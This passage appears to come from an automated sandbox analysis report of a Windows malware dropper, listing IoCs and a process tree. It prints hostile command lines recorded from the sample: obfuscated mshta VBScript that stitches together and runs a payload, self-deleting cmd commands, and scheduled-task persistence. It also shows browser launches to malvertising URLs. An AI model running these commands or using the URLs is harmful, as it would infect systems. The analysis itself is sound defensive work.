Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | MicrosoftEdgeUpdate.exe
-
Modifies registry class 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid   process
1012  Fri051e1e7444.exe
2996  qpVL2ZesZ5Dciz3WyY2qTUz4.exe
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
pid   process
3232
9532  msedge.exe
752   foldershare.exe
-
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid   process
3076  G51K2QNgA1moFPDcsqFsEuBz.exe
1844  1435.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs
Processes:
pid   process
6424  msedge.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid    process
13044  installer.exe
6424   msedge.exe
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid   process
3232
-
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 4 IoCs
Processes:
description      ioc                                                                                                          process
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext                                      setup.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\                               setup.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID                                setup.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1"  setup.exe
Processes
-
[level 1] C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe
command line: "C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[level 2] C:\Users\Admin\Pictures\Adobe Films\qpVL2ZesZ5Dciz3WyY2qTUz4.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\qpVL2ZesZ5Dciz3WyY2qTUz4.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
[level 2] C:\Users\Admin\Pictures\Adobe Films\dcXxD_mTLuOWLK7yvm0uWiKh.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\dcXxD_mTLuOWLK7yvm0uWiKh.exe"
- Executes dropped EXE
-
[level 3] C:\Users\Admin\AppData\Local\Temp\build.exe
command line: "C:\Users\Admin\AppData\Local\Temp\build.exe"
- Executes dropped EXE
- Checks processor information in registry
-
[level 4] C:\Windows\SysWOW64\cmd.exe
command line: "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit
-
[level 5] C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /im build.exe /f
- Kills process with taskkill
-
[level 5] C:\Windows\SysWOW64\timeout.exe
command line: timeout /t 6
- Delays execution with timeout.exe
-
[level 2] C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe"
- Executes dropped EXE
-
[level 4] C:\Windows\SysWOW64\WerFault.exe
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 208
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[level 2] C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
[level 3] C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
[level 4] C:\Windows\SysWOW64\cmd.exe
command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DmjYaTcFdw.bat"
-
[level 5] C:\Windows\SysWOW64\w32tm.exe
command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
-
[level 6] C:\Windows\system32\w32tm.exe
command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
-
[level 5] C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
[level 6] C:\Windows\SysWOW64\cmd.exe
command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UtehC4VHgM.bat"
-
[level 7] C:\Windows\SysWOW64\w32tm.exe
command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
-
[level 8] C:\Windows\system32\w32tm.exe
command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
-
[level 7] C:\Recovery\WindowsRE\msedge.exe
command line: "C:\Recovery\WindowsRE\msedge.exe"
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
[level 2] C:\Users\Admin\Pictures\Adobe Films\ZPIklAxPB6jR82sYubVd1wws.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\ZPIklAxPB6jR82sYubVd1wws.exe"
- Executes dropped EXE
-
[level 3] C:\Windows\SysWOW64\WerFault.exe
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 252
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
[level 2] C:\Users\Admin\Pictures\Adobe Films\D9dd_RETOj4JIUabpjwAT2fp.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\D9dd_RETOj4JIUabpjwAT2fp.exe"
- Executes dropped EXE
-
[level 3] C:\Windows\SysWOW64\schtasks.exe
command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
- Creates scheduled task(s)
-
[level 3] C:\Windows\SysWOW64\schtasks.exe
command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
- Creates scheduled task(s)
-
[level 3] C:\Users\Admin\Documents\G3yhd3bJJbP04w8gmz860v7W.exe
command line: "C:\Users\Admin\Documents\G3yhd3bJJbP04w8gmz860v7W.exe"
- Executes dropped EXE
-
[level 4] C:\Users\Admin\Pictures\Adobe Films\XNzIcv2Kkl8zVywu80iKVE8U.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\XNzIcv2Kkl8zVywu80iKVE8U.exe"
- Executes dropped EXE
-
[level 4] C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe
command line: "C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe"
- Executes dropped EXE
-
[level 5] C:\Windows\SysWOW64\mshta.exe
command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
-
[level 6] C:\Windows\SysWOW64\cmd.exe
command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe" ) do taskkill -f -iM "%~NxM"
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "KSYXHNTmRqvS6Y0tsYgqtLKS.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\rrC17Jxann9wXbNQOrrI4sZa.exe"C:\Users\Admin\Pictures\Adobe Films\rrC17Jxann9wXbNQOrrI4sZa.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\YkJJP9hUDzrPj8CaQUtFkm4K.exe"C:\Users\Admin\Pictures\Adobe Films\YkJJP9hUDzrPj8CaQUtFkm4K.exe" /mixtwo4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 2525⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\6VJcPvgbLTEnL3gyVOmcMDK4.exe"C:\Users\Admin\Pictures\Adobe Films\6VJcPvgbLTEnL3gyVOmcMDK4.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 2485⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\VgPCyYrKaciomQNCsBVgxTDM.exe"C:\Users\Admin\Pictures\Adobe Films\VgPCyYrKaciomQNCsBVgxTDM.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-A3J6H.tmp\VgPCyYrKaciomQNCsBVgxTDM.tmp"C:\Users\Admin\AppData\Local\Temp\is-A3J6H.tmp\VgPCyYrKaciomQNCsBVgxTDM.tmp" /SL5="$5023E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\VgPCyYrKaciomQNCsBVgxTDM.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-Q7J33.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-Q7J33.tmp\DYbALA.exe" /S /UID=27096⤵
-
C:\Program Files\Windows NT\FMIXWSNWAR\foldershare.exe"C:\Program Files\Windows NT\FMIXWSNWAR\foldershare.exe" /VERYSILENT7⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\e8-44431-176-86cbf-919586635e4d8\Vumobazhaxi.exe"C:\Users\Admin\AppData\Local\Temp\e8-44431-176-86cbf-919586635e4d8\Vumobazhaxi.exe"7⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,17519730187947641337,9118907866499339036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,17519730187947641337,9118907866499339036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=13396808⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Users\Admin\AppData\Local\Temp\66-c5ed9-ad9-af585-ceced0e58f52f\Quvyturyha.exe"C:\Users\Admin\AppData\Local\Temp\66-c5ed9-ad9-af585-ceced0e58f52f\Quvyturyha.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nvx1agmo.r0j\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nvx1agmo.r0j\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nvx1agmo.r0j\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13216 -s 24810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\installer.exeC:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634658939 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cw2b4zji.es4\any.exe & exit8⤵
-
